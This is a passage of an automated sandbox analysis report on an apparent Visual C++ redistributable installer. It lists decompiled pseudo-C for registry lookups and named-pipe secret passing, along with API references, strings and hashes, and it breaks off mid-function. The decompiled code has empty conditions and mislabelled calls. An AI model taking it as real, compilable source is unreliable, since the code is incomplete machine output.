                                                                          0x000b5482
                                                                          0x000b5484
                                                                          0x000b5484
                                                                          0x000b5490
                                                                          0x000b5492
                                                                          0x000b5492
                                                                          0x000b5499
                                                                          0x000b549b
                                                                          0x000b549b
                                                                          0x000b54a8
                                                                          0x000b54ac
                                                                          0x000b54b8
                                                                          0x000b54ae
                                                                          0x000b54ae
                                                                          0x000b54ae
                                                                          0x000b54c0
                                                                          0x000b54c9
                                                                          0x000b54d3
                                                                          0x000b54d5
                                                                          0x000b54dc
                                                                          0x000b54e2
                                                                          0x000b54e2
                                                                          0x000b54d3
                                                                          0x000b54e5
                                                                          0x000b54ea
                                                                          0x000b54ec
                                                                          0x000b54ee
                                                                          0x000b54ee
                                                                          0x000b54f5
                                                                          0x000b550c
                                                                          0x000b550c

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 000B510F
                                                                            • Part of subcall function 000F03F0: InitializeCriticalSection.KERNEL32(0011B60C,?,000B511B,00000000,?,?,?,?,?,?), ref: 000F0407
                                                                            • Part of subcall function 000B1209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,000B5137,00000000,?), ref: 000B1247
                                                                            • Part of subcall function 000B1209: GetLastError.KERNEL32(?,?,?,000B5137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 000B1251
                                                                          • CoInitializeEx.OLE32(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 000B517D
                                                                            • Part of subcall function 000F0CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 000F0CF2
                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 000B520F
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 000B5219
                                                                          • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000B549B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                          • String ID: 3.10.4.4718$@Met$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$user.cpp$txt
                                                                          • API String ID: 3262001429-1227006524
                                                                          • Opcode ID: 327bee585929c58ac32877c1599000ad13a3b2dd249660a4ef555255cebbf002
                                                                          • Instruction ID: e47c85cb182d8fbb915d0850d70bad195eca4c3fd72bbf0af198f811b1e4095f
                                                                          • Opcode Fuzzy Hash: 327bee585929c58ac32877c1599000ad13a3b2dd249660a4ef555255cebbf002
                                                                          • Instruction Fuzzy Hash: 85B1A571D41A2D9BDB32AB64CC46BFD76A8AF04702F0400D5FA09B6642DB719F809F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E000BA311(long _a4, intOrPtr _a8) {
                                                                          				int _v8;
                                                                          				char _v12;
                                                                          				int _v16;
                                                                          				int _v20;
                                                                          				int _v24;
                                                                          				intOrPtr _v32;
                                                                          				void _v48;
                                                                          				void* _t74;
                                                                          				void* _t76;
                                                                          				signed short _t79;
                                                                          				signed short _t85;
                                                                          				void* _t87;
                                                                          				void* _t89;
                                                                          				void* _t93;
                                                                          				void* _t103;
                                                                          				long _t106;
                                                                          				signed short _t110;
                                                                          				void* _t114;
                                                                          				WCHAR* _t131;
                                                                          				signed int _t132;
                                                                          				long _t143;
                                                                          				void* _t145;
                                                                          				void* _t147;
                                                                          				void* _t148;
                                                                          				void* _t158;
                                                                          				void* _t159;
                                                                          
                                                                          				_t132 = 6;
                                                                          				memset( &_v48, 0, _t132 << 2);
                                                                          				_t159 = _t158 + 0xc;
                                                                          				_t143 = _a4;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_t131 = 0;
                                                                          				_t72 =  ==  ? 1 : 0x101;
                                                                          				_v24 = 0;
                                                                          				_a4 =  ==  ? 1 : 0x101;
                                                                          				_v8 = 0;
                                                                          				_t74 = E000B71CF(_a8,  *((intOrPtr*)(_t143 + 0x1c)),  &_v12, 0); // executed
                                                                          				if(_t74 >= 0) {
                                                                          					if( *((intOrPtr*)(_t143 + 0x20)) == 0) {
                                                                          						L5:
                                                                          						_t76 = E000F0E3F( *((intOrPtr*)(_t143 + 0x18)), _v12, _a4,  &_v16); // executed
                                                                          						_t145 = _t76;
                                                                          						if(_t145 != 0x80070002) {
                                                                          							if(_t145 >= 0) {
                                                                          								_t79 = RegQueryValueExW(_v16, _v20, 0,  &_v24, 0,  &_v8); // executed
                                                                          								if(_t79 != 2) {
                                                                          									if(_t79 == 0) {
                                                                          										_t131 = E000B38D4(_v8 + 2, 1);
                                                                          										if(_t131 != 0) {
                                                                          											_t85 = RegQueryValueExW(_v16, _v20, 0,  &_v24, _t131,  &_v8); // executed
                                                                          											if(_t85 == 0) {
                                                                          												_t87 = _v24 - 1;
                                                                          												if(_t87 == 0) {
                                                                          													L38:
                                                                          													_t89 = E000D02F4( &_v48, _t131, 0);
                                                                          													goto L39;
                                                                          												} else {
                                                                          													_t103 = _t87 - 1;
                                                                          													if(_t103 == 0) {
                                                                          														if( *((intOrPtr*)(_t143 + 0x28)) == 0) {
                                                                          															goto L38;
                                                                          														} else {
                                                                          															_t147 = E000B1EDE( &_v48, _v8);
                                                                          															if(_t147 >= 0) {
                                                                          																_v32 = 2;
                                                                          																_t106 = ExpandEnvironmentStringsW(_t131, _v48, _v8);
                                                                          																_a4 = _t106;
                                                                          																if(_t106 <= _v8) {
                                                                          																	goto L40;
                                                                          																} else {
                                                                          																	_t148 = E000B1EDE( &_v48, _t106);
                                                                          																	if(_t148 < 0) {
                                                                          																		goto L33;
                                                                          																	} else {
                                                                          																		if(_a4 == ExpandEnvironmentStringsW(_t131, _v48, _a4)) {
                                                                          																			goto L40;
                                                                          																		} else {
                                                                          																			_t110 = GetLastError();
                                                                          																			_t151 =  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
                                                                          																			_t148 =  >=  ? 0x80004005 :  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
                                                                          																			E000B37D3(0x80004005, "search.cpp", 0x396, _t148);
                                                                          																			_push("Failed to get expand environment string.");
                                                                          																			goto L46;
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																L33:
                                                                          																_push("Failed to allocate string buffer.");
                                                                          																goto L46;
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														_t114 = _t103;
                                                                          														if(_t114 == 0) {
                                                                          															if(_v8 != 4) {
                                                                          																goto L26;
                                                                          															} else {
                                                                          																asm("cdq");
                                                                          																_push(0);
                                                                          																_push( *_t131);
                                                                          																goto L28;
                                                                          															}
                                                                          														} else {
                                                                          															if(_t114 == 7) {
                                                                          																if(_v8 == 8) {
                                                                          																	_push(_t131[2]);
                                                                          																	_push( *_t131);
                                                                          																	L28:
                                                                          																	_push( &_v48);
                                                                          																	_t89 = E000D02B0();
                                                                          																	L39:
                                                                          																	_t147 = _t89;
                                                                          																	L40:
                                                                          																	if(_t147 >= 0) {
                                                                          																		_t148 = E000CFEB7(0,  &_v48,  *((intOrPtr*)(_t143 + 0x14)));
                                                                          																		if(_t148 >= 0) {
                                                                          																			_t93 = E000B8137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48); // executed
                                                                          																			_t148 = _t93;
                                                                          																			if(_t148 < 0) {
                                                                          																				_push("Failed to set variable.");
                                                                          																				goto L46;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_push("Failed to change value type.");
                                                                          																			goto L46;
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to read registry value.");
                                                                          																		goto L46;
                                                                          																	}
                                                                          																} else {
                                                                          																	L26:
                                                                          																	_t148 = 0x8000ffff;
                                                                          																	goto L47;
                                                                          																}
                                                                          															} else {
                                                                          																_t148 = 0x80004001;
                                                                          																E000F012F(0x80004001, "Unsupported registry key value type. Type = \'%u\'", _v24);
                                                                          																_t159 = _t159 + 0xc;
                                                                          																goto L47;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												_t154 =  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
                                                                          												_t148 =  >=  ? 0x80004005 :  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
                                                                          												E000B37D3(0x80004005, "search.cpp", 0x375, _t148);
                                                                          												_push("Failed to query registry key value.");
                                                                          												goto L46;
                                                                          											}
                                                                          										} else {
                                                                          											_t148 = 0x8007000e;
                                                                          											E000B37D3(_t82, "search.cpp", 0x372, 0x8007000e);
                                                                          											_push("Failed to allocate memory registry value.");
                                                                          											_push(0x8007000e);
                                                                          											E000F012F();
                                                                          											goto L47;
                                                                          										}
                                                                          									} else {
                                                                          										_t157 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          										_t148 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          										E000B37D3(0x80004005, "search.cpp", 0x36f, _t148);
                                                                          										_push("Failed to query registry key value size.");
                                                                          										goto L46;
                                                                          									}
                                                                          								} else {
                                                                          									_push(_v20);
                                                                          									E000F061A(_t79, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v12);
                                                                          									_t159 = _t159 + 0x10;
                                                                          									goto L7;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to open registry key.");
                                                                          								goto L46;
                                                                          							}
                                                                          						} else {
                                                                          							E000F061A(2, "Registry key not found. Key = \'%ls\'", _v12);
                                                                          							_t159 = _t159 + 0xc;
                                                                          							L7:
                                                                          							_t148 = E000B8137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48);
                                                                          							if(_t148 >= 0) {
                                                                          								_t148 = 0;
                                                                          							} else {
                                                                          								_push("Failed to clear variable.");
                                                                          								goto L46;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t148 = E000B71CF(_a8,  *((intOrPtr*)(_t143 + 0x20)),  &_v20, 0);
                                                                          						if(_t148 >= 0) {
                                                                          							goto L5;
                                                                          						} else {
                                                                          							_push("Failed to format value string.");
                                                                          							goto L46;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to format key string.");
                                                                          					L46:
                                                                          					_push(_t148);
                                                                          					E000F012F();
                                                                          					if(_t148 < 0) {
                                                                          						L47:
                                                                          						_push(_t148);
                                                                          						E000F061A(2, "RegistrySearchValue failed: ID \'%ls\', HRESULT 0x%x", _v12);
                                                                          					}
                                                                          				}
                                                                          				E000B2793(_v12);
                                                                          				E000B2793(_v20);
                                                                          				if(_v16 != 0) {
                                                                          					RegCloseKey(_v16); // executed
                                                                          					_v16 = _v16 & 0x00000000;
                                                                          				}
                                                                          				if(_t131 != 0) {
                                                                          					E000B3999(_t131);
                                                                          				}
                                                                          				E000D0499( &_v48);
                                                                          				return _t148;
                                                                          			}






























                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000BA356
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000BA37C
                                                                          • RegCloseKey.KERNELBASE(00000000,?,00000000,?,?,?,?,?), ref: 000BA666
                                                                          Strings
                                                                          • Failed to format key string., xrefs: 000BA361
                                                                          • Failed to set variable., xrefs: 000BA629
                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 000BA418
                                                                          • Failed to clear variable., xrefs: 000BA3D4
                                                                          • Failed to get expand environment string., xrefs: 000BA5DB
                                                                          • Unsupported registry key value type. Type = '%u', xrefs: 000BA506
                                                                          • Failed to format value string., xrefs: 000BA387
                                                                          • Failed to change value type., xrefs: 000BA60D
                                                                          • search.cpp, xrefs: 000BA44A, 000BA47D, 000BA4CE, 000BA5D1
                                                                          • Failed to query registry key value., xrefs: 000BA4D8
                                                                          • @Met, xrefs: 000BA5AD
                                                                          • Failed to allocate string buffer., xrefs: 000BA565
                                                                          • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 000BA63E
                                                                          • Failed to query registry key value size., xrefs: 000BA454
                                                                          • Failed to open registry key., xrefs: 000BA3E9
                                                                          • Registry key not found. Key = '%ls', xrefs: 000BA3B0
                                                                          • Failed to allocate memory registry value., xrefs: 000BA487
                                                                          • Failed to read registry value., xrefs: 000BA5F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16$Close
                                                                          • String ID: @Met$Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                          • API String ID: 2348241696-68201321
                                                                          • Opcode ID: c9bbfefc37ef59a999227218596157e48d48f2f5166dec1f96eec1951d61d518
                                                                          • Instruction ID: 0a20d774fb148a2af400a0ad3c8a7c39aa05ce555af3452b9972630b389a9656
                                                                          • Opcode Fuzzy Hash: c9bbfefc37ef59a999227218596157e48d48f2f5166dec1f96eec1951d61d518
                                                                          • Instruction Fuzzy Hash: 71A1E7B2E40619BBDF219AA4CC05FFE7BA9AF05710F144121FA04BA551DB71DE10EBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 726 c52e3-c5326 lstrlenW GetCurrentProcessId 727 c5329-c5330 726->727 728 c5336-c534e SetNamedPipeHandleState 727->728 729 c55b2-c55ba 727->729 730 c557b-c55a5 GetLastError call b37d3 728->730 731 c5354 728->731 738 c55aa-c55b1 call f012f 730->738 732 c5358-c5363 ConnectNamedPipe 731->732 734 c539c-c53a2 732->734 735 c5365-c536c GetLastError 732->735 734->732 737 c53a4-c53a6 734->737 739 c5457-c5459 735->739 740 c5372-c5377 735->740 741 c53ac-c53c1 SetNamedPipeHandleState 737->741 742 c5463-c5478 call b37d3 737->742 738->729 739->741 744 c537d-c5385 740->744 745 c5444-c5452 740->745 746 c554a-c5579 GetLastError call b37d3 741->746 747 c53c7-c53dc WriteFile 741->747 742->738 750 c545e 744->750 751 c538b-c5396 Sleep 744->751 745->737 746->738 752 c5519-c5548 GetLastError call b37d3 747->752 753 c53e2-c53f7 WriteFile 747->753 750->742 751->734 752->738 756 c53fd-c5412 WriteFile 753->756 757 c54e5-c5514 GetLastError call b37d3 753->757 760 c5418-c542d ReadFile 756->760 761 c54b1-c54e0 GetLastError call b37d3 756->761 757->738 765 c547d-c54ac GetLastError call b37d3 760->765 766 c542f-c5439 760->766 761->738 765->738 766->727 769 c543f 766->769 769->729
                                                                          C-Code - Quality: 81%
                                                                          			E000C52E3(long _a4) {
                                                                          				long _v8;
                                                                          				signed int _v12;
                                                                          				void _v16;
                                                                          				signed int _v20;
                                                                          				void* _v24;
                                                                          				void _v28;
                                                                          				void _v32;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				WCHAR* _t40;
                                                                          				long _t43;
                                                                          				signed int _t44;
                                                                          				int _t47;
                                                                          				signed short _t48;
                                                                          				signed short _t52;
                                                                          				int _t55;
                                                                          				signed short _t56;
                                                                          				signed short _t62;
                                                                          				signed short _t67;
                                                                          				signed short _t73;
                                                                          				int _t78;
                                                                          				signed short _t79;
                                                                          				void* _t83;
                                                                          				long _t84;
                                                                          				signed int _t88;
                                                                          				void* _t109;
                                                                          
                                                                          				_t84 = _a4;
                                                                          				_t88 = 0;
                                                                          				_v40 =  *((intOrPtr*)(_t84 + 0x10));
                                                                          				_v36 =  *((intOrPtr*)(_t84 + 0x14));
                                                                          				_t40 =  *(_t84 + 4);
                                                                          				_v24 = _t40;
                                                                          				_v16 = lstrlenW(_t40) + _t41;
                                                                          				_t43 = GetCurrentProcessId();
                                                                          				_v32 = _v32 & 0;
                                                                          				_a4 = _a4 & 0;
                                                                          				_v28 = _t43;
                                                                          				_t44 = 0;
                                                                          				_v20 = 0;
                                                                          				while(1) {
                                                                          					L1:
                                                                          					_t83 =  *(_t109 + _t44 * 4 - 0x24);
                                                                          					if(_t83 == 0xffffffff) {
                                                                          						break;
                                                                          					}
                                                                          					_v8 = 1;
                                                                          					_t47 = SetNamedPipeHandleState(_t83,  &_v8, 0, 0); // executed
                                                                          					if(_t47 == 0) {
                                                                          						_t48 = GetLastError();
                                                                          						_t91 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						_t88 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "pipe.cpp", 0x1ce, _t88);
                                                                          						_push("Failed to set pipe to non-blocking.");
                                                                          						goto L28;
                                                                          					} else {
                                                                          						_v12 = _v12 & 0x00000000;
                                                                          						do {
                                                                          							_t52 = ConnectNamedPipe(_t83, 0); // executed
                                                                          							if(_t52 != 0) {
                                                                          								goto L9;
                                                                          							} else {
                                                                          								_t52 = GetLastError();
                                                                          								if(_t52 == 0x217) {
                                                                          									_t88 = 0;
                                                                          									L11:
                                                                          									_v8 = _v8 & 0x00000000;
                                                                          									_t55 = SetNamedPipeHandleState(_t83,  &_v8, 0, 0); // executed
                                                                          									if(_t55 == 0) {
                                                                          										_t56 = GetLastError();
                                                                          										_t94 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          										_t88 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          										E000B37D3(0x80004005, "pipe.cpp", 0x1f9, _t88);
                                                                          										_push("Failed to reset pipe to blocking.");
                                                                          										goto L28;
                                                                          									} else {
                                                                          										if(WriteFile(_t83,  &_v16, 4,  &_a4, 0) == 0) {
                                                                          											_t62 = GetLastError();
                                                                          											_t97 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          											_t88 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          											E000B37D3(0x80004005, "pipe.cpp", 0x1ff, _t88);
                                                                          											_push("Failed to write secret length to pipe.");
                                                                          											goto L28;
                                                                          										} else {
                                                                          											if(WriteFile(_t83, _v24, _v16,  &_a4, 0) == 0) {
                                                                          												_t67 = GetLastError();
                                                                          												_t100 =  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
                                                                          												_t88 =  >=  ? 0x80004005 :  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
                                                                          												E000B37D3(0x80004005, "pipe.cpp", 0x204, _t88);
                                                                          												_push("Failed to write secret to pipe.");
                                                                          												goto L28;
                                                                          											} else {
                                                                          												if(WriteFile(_t83,  &_v28, 4,  &_a4, 0) == 0) {
                                                                          													_t73 = GetLastError();
                                                                          													_t103 =  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
                                                                          													_t88 =  >=  ? 0x80004005 :  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
                                                                          													E000B37D3(0x80004005, "pipe.cpp", 0x209, _t88);
                                                                          													_push("Failed to write our process id to pipe.");
                                                                          													goto L28;
                                                                          												} else {
                                                                          													_t78 = ReadFile(_t83,  &_v32, 4,  &_a4, 0); // executed
                                                                          													if(_t78 == 0) {
                                                                          														_t79 = GetLastError();
                                                                          														_t106 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          														_t88 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          														E000B37D3(0x80004005, "pipe.cpp", 0x20f, _t88);
                                                                          														_push("Failed to read ACK from pipe.");
                                                                          														goto L28;
                                                                          													} else {
                                                                          														_t44 = _v20 + 1;
                                                                          														_v20 = _t44;
                                                                          														if(_t44 < 2) {
                                                                          															goto L1;
                                                                          														} else {
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									if(_t52 != 0x218) {
                                                                          										_t88 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          										break;
                                                                          									} else {
                                                                          										_t52 = _v12;
                                                                          										if(_t52 >= 0x708) {
                                                                          											_t88 = 0x800705b4;
                                                                          											L21:
                                                                          											E000B37D3(_t52, "pipe.cpp", 0x1f3, _t88);
                                                                          											_push("Failed to wait for child to connect to pipe.");
                                                                          											L28:
                                                                          											_push(_t88);
                                                                          											E000F012F();
                                                                          										} else {
                                                                          											_t52 = _t52 + 1;
                                                                          											_t88 = 0x80070218;
                                                                          											_v12 = _t52;
                                                                          											Sleep(0x64); // executed
                                                                          											goto L9;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							goto L29;
                                                                          							L9:
                                                                          						} while (_t88 == 0x80070218);
                                                                          						if(_t88 < 0) {
                                                                          							goto L21;
                                                                          						} else {
                                                                          							goto L11;
                                                                          						}
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				L29:
                                                                          				return _t88;
                                                                          			}

                                                                          0x000c53a6
                                                                          0x00000000
                                                                          0x000c534e
                                                                          0x000c55b3
                                                                          0x000c55ba

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00000000,?,000FB4F0,?,00000000,?,000B442A,?,000FB4F0), ref: 000C5304
                                                                          • GetCurrentProcessId.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C530F
                                                                          • SetNamedPipeHandleState.KERNELBASE(?,000000FF,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C5346
                                                                          • ConnectNamedPipe.KERNELBASE(?,00000000,?,000B442A,?,000FB4F0), ref: 000C535B
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C5365
                                                                          • Sleep.KERNELBASE(00000064,?,000B442A,?,000FB4F0), ref: 000C5396
                                                                          • SetNamedPipeHandleState.KERNELBASE(?,00000000,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C53B9
                                                                          • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C53D4
                                                                          • WriteFile.KERNEL32(?,000B442A,000FB4F0,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C53EF
                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C540A
                                                                          • ReadFile.KERNELBASE(?,00000000,00000004,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C5425
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C547D
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C54B1
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C54E5
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C557B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                          • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                          • API String ID: 2944378912-2047837012
                                                                          • Opcode ID: c907c3aeb6e49e5a3b019532e5823b0a1267679e78c0d468cf3b5db45cfb738c
                                                                          • Instruction ID: 6ce237126ed5418f4e2770093bf3790831a6f57444c12b7adf6a39969bff482c
                                                                          • Opcode Fuzzy Hash: c907c3aeb6e49e5a3b019532e5823b0a1267679e78c0d468cf3b5db45cfb738c
                                                                          • Instruction Fuzzy Hash: EE61C7B6E40725ABF7209BA9CC45FFFB6E8EF04741F114125BD01E7180D7A49E409AE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          [Figure: control-flow graph 772, starting at block b567d-b56c4; legend: Executed / Not Executed]
                                                                          C-Code - Quality: 63%
                                                                          			E000B567D(struct _CRITICAL_SECTION* _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                          				signed int _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				char _v36;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _t138;
                                                                          				WCHAR* _t141;
                                                                          				intOrPtr _t143;
                                                                          				WCHAR* _t144;
                                                                          				signed short _t156;
                                                                          				signed short _t162;
                                                                          				intOrPtr _t168;
                                                                          				signed short _t169;
                                                                          				WCHAR* _t182;
                                                                          				WCHAR* _t190;
                                                                          				intOrPtr _t199;
                                                                          				signed int _t215;
                                                                          				void* _t216;
                                                                          				char _t219;
                                                                          				void* _t221;
                                                                          				char _t227;
                                                                          				intOrPtr* _t228;
                                                                          				signed int _t229;
                                                                          				intOrPtr* _t237;
                                                                          				WCHAR* _t238;
                                                                          				signed int _t239;
                                                                          				WCHAR* _t240;
                                                                          				signed int _t241;
                                                                          				signed int _t242;
                                                                          				WCHAR* _t243;
                                                                          				intOrPtr _t244;
                                                                          				WCHAR* _t248;
                                                                          				WCHAR* _t249;
                                                                          				intOrPtr _t250;
                                                                          				void* _t265;
                                                                          
                                                                          				_t215 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v24 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_v36 = 0;
                                                                          				_v32 = 0;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t238 = _a8;
                                                                          				_t248 = E000B1EDE( &_v16, lstrlenW(_t238) + 1);
                                                                          				_a8 = _t248;
                                                                          				if(_t248 >= 0) {
                                                                          					while(1) {
                                                                          						_push(0x5b);
                                                                          						_t216 = E000DF7CA(_t219);
                                                                          						_t221 = _t238;
                                                                          						if(_t216 == 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t12 = _t216 + 2; // 0x2
                                                                          						_push(0x5d);
                                                                          						_t138 = E000DF7CA(_t221);
                                                                          						_v40 = _t138;
                                                                          						if(_t138 == 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t219 = (_t138 - _t216 >> 1) - 1;
                                                                          						_v20 = _t219;
                                                                          						if(_t219 != 0) {
                                                                          							if(_t216 <= _t238) {
                                                                          								L12:
                                                                          								_t26 = _t216 + 2; // 0x2
                                                                          								_v28 = 0 | _a20 == 0x00000000;
                                                                          								_t249 = E000B8281(_a20 == 0,  &_v12, _t26, _t219);
                                                                          								_a8 = _t249;
                                                                          								if(_t249 < 0) {
                                                                          									_push("Failed to get variable name.");
                                                                          									L7:
                                                                          									_push(_t249);
                                                                          									L8:
                                                                          									E000F012F();
                                                                          									L66:
                                                                          									_t215 = _v8;
                                                                          									goto L67;
                                                                          								}
                                                                          								_t219 = _v24;
                                                                          								_push(1);
                                                                          								_push(4 + _v8 * 4);
                                                                          								if(_t219 == 0) {
                                                                          									_t244 = E000B38D4();
                                                                          									_v24 = _t244;
                                                                          									if(_t244 == 0) {
                                                                          										_t243 = 0x8007000e;
